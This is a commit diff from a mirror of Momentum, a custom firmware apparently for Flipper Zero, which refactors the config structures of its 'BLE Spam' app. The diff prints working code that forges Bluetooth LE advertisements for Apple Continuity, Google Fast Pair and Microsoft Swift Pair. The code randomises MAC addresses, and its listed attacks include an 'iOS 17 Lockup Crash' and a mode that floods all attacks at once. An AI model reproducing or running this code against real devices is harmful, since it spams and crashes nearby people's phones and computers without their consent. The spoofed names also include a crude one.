Mirror/Momentum-Firmware
1
0
Fork 0
mirror of https://github.com/Next-Flip/Momentum-Firmware.git synced 2026-05-14 14:18:35 -07:00
Code Issues Packages Projects Releases Wiki Activity

BLE Spam refactor config structures --nobuild

Browse Source
This commit is contained in:
Willy-JL
2023-10-16 13:55:33 +01:00
parent c3536f7ecd
commit 42ee5f252c
9 changed files with 71 additions and 70 deletions
Download Patch File Download Diff File Expand all files Collapse all files

46
applications/external/ble_spam/ble_spam.c vendored
View File

@@ -11,37 +11,32 @@
// Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576
// Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam
typedef struct {
bool random_mac;
const BleSpamProtocol* protocol;
BleSpamMsg msg;
} Payload;
typedef struct {
const char* title;
const char* text;
Payload payload;
const BleSpamProtocol* protocol;
BleSpamPayload payload;
} Attack;
static Attack attacks[] = {
{
.title = "+ Kitchen Sink",
.text = "Flood all attacks at once",
.protocol = NULL,
.payload =
{
.random_mac = true,
.protocol = NULL,
.msg = {},
.cfg = {},
},
},
{
.title = "iOS 17 Lockup Crash",
.text = "Newer iPhones, long range",
.protocol = &ble_spam_protocol_continuity,
.payload =
{
.random_mac = false,
.protocol = &ble_spam_protocol_continuity,
.msg =
.cfg =
{
.continuity =
{
@@ -54,11 +49,11 @@ static Attack attacks[] = {
{
.title = "Apple Action Modal",
.text = "Lock cooldown, long range",
.protocol = &ble_spam_protocol_continuity,
.payload =
{
.random_mac = false,
.protocol = &ble_spam_protocol_continuity,
.msg =
.cfg =
{
.continuity =
{
@@ -71,11 +66,11 @@ static Attack attacks[] = {
{
.title = "Apple Device Popup",
.text = "No cooldown, close range",
.protocol = &ble_spam_protocol_continuity,
.payload =
{
.random_mac = false,
.protocol = &ble_spam_protocol_continuity,
.msg =
.cfg =
{
.continuity =
{
@@ -88,11 +83,11 @@ static Attack attacks[] = {
{
.title = "Android Device Pair",
.text = "Reboot cooldown, long range",
.protocol = &ble_spam_protocol_fastpair,
.payload =
{
.random_mac = true,
.protocol = &ble_spam_protocol_fastpair,
.msg =
.cfg =
{
.fastpair = {},
},
@@ -101,11 +96,11 @@ static Attack attacks[] = {
{
.title = "Windows Device Found",
.text = "Requires enabling SwiftPair",
.protocol = &ble_spam_protocol_swiftpair,
.payload =
{
.random_mac = true,
.protocol = &ble_spam_protocol_swiftpair,
.msg =
.cfg =
{
.swiftpair = {},
},
@@ -131,12 +126,13 @@ static int32_t adv_thread(void* ctx) {
uint16_t delay;
uint8_t* packet;
uint8_t mac[GAP_MAC_ADDR_SIZE];
Payload* payload = &attacks[state->index].payload;
BleSpamPayload* payload = &attacks[state->index].payload;
const BleSpamProtocol* protocol = attacks[state->index].protocol;
if(!payload->random_mac) furi_hal_random_fill_buf(mac, sizeof(mac));
while(state->advertising) {
if(payload->protocol) {
payload->protocol->make_packet(&size, &packet, &payload->msg);
if(protocol) {
protocol->make_packet(&size, &packet, &payload->cfg);
} else {
ble_spam_protocols[rand() % ble_spam_protocols_count]->make_packet(
&size, &packet, NULL);
@@ -200,8 +196,8 @@ static void draw_callback(Canvas* canvas, void* ctx) {
const Attack* attack =
(state->index >= 0 && state->index <= ATTACK_COUNT - 1) ? &attacks[state->index] : NULL;
const Payload* payload = &attack->payload;
const BleSpamProtocol* protocol = (attack && payload->protocol) ? payload->protocol : NULL;
const BleSpamPayload* payload = &attack->payload;
const BleSpamProtocol* protocol = attack->protocol;
canvas_set_font(canvas, FontSecondary);
canvas_draw_icon(canvas, 4, 3, protocol ? protocol->icon : &I_ble);
@@ -290,7 +286,7 @@ static void draw_callback(Canvas* canvas, void* ctx) {
"%02i/%02i: %s",
state->index + 1,
ATTACK_COUNT,
protocol ? protocol->get_name(&payload->msg) : "Everything");
protocol ? protocol->get_name(&payload->cfg) : "Everything");
canvas_draw_str(canvas, 4 - (state->index < 19 ? 1 : 0), 21, str);
canvas_set_font(canvas, FontPrimary);

6
applications/external/ble_spam/protocols/_base.h vendored
View File

@@ -8,10 +8,10 @@
#include <furi_hal_random.h>
#include <core/core_defines.h>
typedef union BleSpamMsg BleSpamMsg;
typedef union BleSpamProtocolCfg BleSpamProtocolCfg;
typedef struct {
const Icon* icon;
const char* (*get_name)(const BleSpamMsg* _msg);
void (*make_packet)(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg);
const char* (*get_name)(const BleSpamProtocolCfg* _cfg);
void (*make_packet)(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg);
} BleSpamProtocol;

13
applications/external/ble_spam/protocols/_registry.h vendored
View File

@@ -4,12 +4,17 @@
#include "fastpair.h"
#include "swiftpair.h"
union BleSpamMsg {
ContinuityMsg continuity;
FastpairMsg fastpair;
SwiftpairMsg swiftpair;
union BleSpamProtocolCfg {
ContinuityCfg continuity;
FastpairCfg fastpair;
SwiftpairCfg swiftpair;
};
extern const BleSpamProtocol* ble_spam_protocols[];
extern const size_t ble_spam_protocols_count;
typedef struct {
bool random_mac;
BleSpamProtocolCfg cfg;
} BleSpamPayload;

34
applications/external/ble_spam/protocols/continuity.c vendored
View File

@@ -16,9 +16,9 @@ static const char* type_names[ContinuityTypeCount] = {
[ContinuityTypeNearbyInfo] = "Nearby Info",
[ContinuityTypeCustomCrash] = "Custom Packet",
};
const char* continuity_get_name(const BleSpamMsg* _msg) {
const ContinuityMsg* msg = &_msg->continuity;
return type_names[msg->type];
const char* continuity_get_name(const BleSpamProtocolCfg* _cfg) {
const ContinuityCfg* cfg = &_cfg->continuity;
return type_names[cfg->type];
}
#define HEADER_LEN (6) // 1 Size + 1 AD Type + 2 Company ID + 1 Continuity Type + 1 Continuity Size
@@ -33,12 +33,12 @@ static uint8_t packet_sizes[ContinuityTypeCount] = {
[ContinuityTypeCustomCrash] = HEADER_LEN + 11,
};
void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) {
const ContinuityMsg* msg = _msg ? &_msg->continuity : NULL;
void continuity_make_packet(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg) {
const ContinuityCfg* cfg = _cfg ? &_cfg->continuity : NULL;
ContinuityType type;
if(msg) {
type = msg->type;
if(cfg) {
type = cfg->type;
} else {
const ContinuityType types[] = {
ContinuityTypeProximityPair,
@@ -85,8 +85,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp
case ContinuityTypeProximityPair: {
uint16_t model;
if(msg && msg->data.proximity_pair.model != 0x0000) {
model = msg->data.proximity_pair.model;
if(cfg && cfg->data.proximity_pair.model != 0x0000) {
model = cfg->data.proximity_pair.model;
} else {
const uint16_t models[] = {
0x0E20, // AirPods Pro
@@ -113,8 +113,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp
}
uint8_t prefix;
if(msg && msg->data.proximity_pair.prefix == 0x00) {
prefix = msg->data.proximity_pair.prefix;
if(cfg && cfg->data.proximity_pair.prefix == 0x00) {
prefix = cfg->data.proximity_pair.prefix;
} else {
if(model == 0x0055 || model == 0x0030)
prefix = 0x05;
@@ -176,8 +176,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp
case ContinuityTypeNearbyAction: {
uint8_t action;
if(msg && msg->data.nearby_action.type != 0x00) {
action = msg->data.nearby_action.type;
if(cfg && cfg->data.nearby_action.type != 0x00) {
action = cfg->data.nearby_action.type;
} else {
const uint8_t actions[] = {
0x13, // AppleTV AutoFill
@@ -197,8 +197,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp
}
uint8_t flag;
if(msg && msg->data.nearby_action.flags != 0x00) {
flag = msg->data.nearby_action.flags;
if(cfg && cfg->data.nearby_action.flags != 0x00) {
flag = cfg->data.nearby_action.flags;
} else {
flag = 0xC0;
if(action == 0x20 && rand() % 2) flag--; // More spam for 'Join This AppleTV?'
@@ -265,8 +265,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp
break;
}
*out_size = size;
*out_packet = packet;
*_size = size;
*_packet = packet;
}
const BleSpamProtocol ble_spam_protocol_continuity = {

2
applications/external/ble_spam/protocols/continuity.h vendored
View File

@@ -31,6 +31,6 @@ typedef struct {
uint8_t type;
} nearby_action;
} data;
} ContinuityMsg;
} ContinuityCfg;
extern const BleSpamProtocol ble_spam_protocol_continuity;

18
applications/external/ble_spam/protocols/fastpair.c vendored
View File

@@ -4,18 +4,18 @@
// Hacked together by @Willy-JL and @Spooks4576
// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
const char* fastpair_get_name(const BleSpamMsg* _msg) {
const FastpairMsg* msg = &_msg->fastpair;
UNUSED(msg);
const char* fastpair_get_name(const BleSpamProtocolCfg* _cfg) {
const FastpairCfg* cfg = &_cfg->fastpair;
UNUSED(cfg);
return "FastPair";
}
void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) {
const FastpairMsg* msg = _msg ? &_msg->fastpair : NULL;
void fastpair_make_packet(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg) {
const FastpairCfg* cfg = _cfg ? &_cfg->fastpair : NULL;
uint32_t model_id;
if(msg && msg->model_id != 0x000000) {
model_id = msg->model_id;
if(cfg && cfg->model_id != 0x000000) {
model_id = cfg->model_id;
} else {
const uint32_t models[] = {
// Genuine devices
@@ -57,8 +57,8 @@ void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpam
packet[i++] = 0x0A; // AD Type (Tx Power Level)
packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm
*out_size = size;
*out_packet = packet;
*_size = size;
*_packet = packet;
}
const BleSpamProtocol ble_spam_protocol_fastpair = {

2
applications/external/ble_spam/protocols/fastpair.h vendored
View File

@@ -6,6 +6,6 @@
typedef struct {
uint32_t model_id;
} FastpairMsg;
} FastpairCfg;
extern const BleSpamProtocol ble_spam_protocol_fastpair;

18
applications/external/ble_spam/protocols/swiftpair.c vendored
View File

@@ -4,18 +4,18 @@
// Hacked together by @Willy-JL and @Spooks4576
// Documentation at https://learn.microsoft.com/en-us/windows-hardware/design/component-guidelines/bluetooth-swift-pair
const char* swiftpair_get_name(const BleSpamMsg* _msg) {
const SwiftpairMsg* msg = &_msg->swiftpair;
UNUSED(msg);
const char* swiftpair_get_name(const BleSpamProtocolCfg* _cfg) {
const SwiftpairCfg* cfg = &_cfg->swiftpair;
UNUSED(cfg);
return "SwiftPair";
}
void swiftpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) {
const SwiftpairMsg* msg = _msg ? &_msg->swiftpair : NULL;
void swiftpair_make_packet(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg) {
const SwiftpairCfg* cfg = _cfg ? &_cfg->swiftpair : NULL;
const char* display_name;
if(msg && msg->display_name[0] != '\0') {
display_name = msg->display_name;
if(cfg && cfg->display_name[0] != '\0') {
display_name = cfg->display_name;
} else {
const char* names[] = {
"Assquach💦",
@@ -43,8 +43,8 @@ void swiftpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpa
memcpy(&packet[i], display_name, display_name_len); // Display Name
i += display_name_len;
*out_size = size;
*out_packet = packet;
*_size = size;
*_packet = packet;
}
const BleSpamProtocol ble_spam_protocol_swiftpair = {

2
applications/external/ble_spam/protocols/swiftpair.h vendored
View File

@@ -6,6 +6,6 @@
typedef struct {
char display_name[25];
} SwiftpairMsg;
} SwiftpairCfg;
extern const BleSpamProtocol ble_spam_protocol_swiftpair;